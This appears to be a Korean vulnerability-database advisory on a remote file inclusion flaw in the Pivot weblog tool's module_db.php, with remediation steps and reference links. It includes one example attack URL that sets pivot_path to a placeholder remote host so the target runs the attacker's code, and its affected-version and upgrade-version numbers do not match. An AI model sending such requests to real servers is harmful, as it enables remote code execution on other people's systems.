English

◀◁ 뒤로 취약점ID 21311 위험도 40 포트 80, ... 프로토콜 TCP 분류 CGI 상세설명 해당 Pivot 소프트웨어는 'module_db.php' 파일에 원격지 파일 포함 취약점을 가지고 있다. Pivot은 데이터베이스가 불필요한 웹 로그(Weblog) 생성 애플리케이션이다. 일부 Pivot 버전에는 파일 포함 함수 호출에 파라미터로서 사용자 입력을 넘기기 전에, 사용자 입력에 대한 적절한 필터링을 하지 않는 결함으로 인하여 원격지 공격자가 원하는 임의의 파일이나 php 코드를 포함시킬 수 있는 취약점이 존재한다. 원격지 공격자들은 다음과 같이 다른 원격지 시스템 상의 악의적인 파일을 명시하기 위해 파라미터로서 path 변수를 사용하여 module_db.php 파일에 잘 조작된 URL 요청을 전달하는 방법으로 로컬 시스템의 권한을 가지고 시스템 상에서 임의의 코드를 실행할 수 있다. http://[target_server]/pivot/modules/module_db.php?pivot_path=http://xxxxxxxxxx/ * 참고 사이트: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html * 영향을 받는 플랫폼: Pivot Web Log Tool 1.14 미만 버전들 모든 운영체제 모든 버전 해결책 다음의 Pivot 웹 사이트를 참조하여 Pivot의 가장 최신 버전(1.4.1 혹은 이후)을 구하여 업그레이드하여야 한다: https://sourceforge.net/project/showfiles.php?group_id=67653&package_id=65955&release_id=245757 임시 조치방법으로, 다음의 Full-Disclosure 메일링 리스트에 2004년 6월 14일(월요일) 15:59:58 CDT 에 게시된 내용을 참조하여 비공식적인 패치를 적용할 수 있다: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html 관련 URL (CVE) 관련 URL 10553 (SecurityFocus) 관련 URL 16418 (ISS)